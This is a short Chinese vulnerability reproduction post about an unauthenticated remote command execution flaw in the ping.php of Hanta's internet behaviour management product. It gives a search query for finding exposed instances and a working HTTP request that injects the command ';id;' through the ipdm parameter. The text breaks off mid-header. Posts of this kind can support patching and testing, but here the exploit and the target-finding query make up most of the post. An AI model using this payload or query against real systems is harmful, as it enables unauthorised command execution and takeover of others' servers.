汉塔上网行为管理 ping.php 远程命令执行漏洞复现(附脚本)
0x01 产品描述:
上海汉塔网络科技有限公司多年来一直专注于网络应用的软件开发,在网络安全、网络协议分析、网络数据流控制等领域有着丰富的经验和雄厚的技术实力。同时,公司积累了丰富的数据通信及网络安全产品研发、生产、销售及服务经验,是行业领先的新一代信息安全产品供应商,目前拥有上网行为管理、IPSecVPN、SSLVPN、流量控制等多款产品
0x02 漏洞描述:
上海汉塔网络科技有限公司上网行为管理系统ping.php存在远程命令执行漏洞,未经授权的攻击者可利用该漏洞远程执行命令以获取服务器权限。
0x03 搜索语句:
body="Antasys"
0x04 漏洞复现:
GET /dgn/dgn_tools/ping.php?ipdm=127.0.0.1;id;&ps=64&cnt=1 HTTP/1.1
Host: your-ip
Priority: u=0, i
User-Agent: Mozilla/5.0 (Maci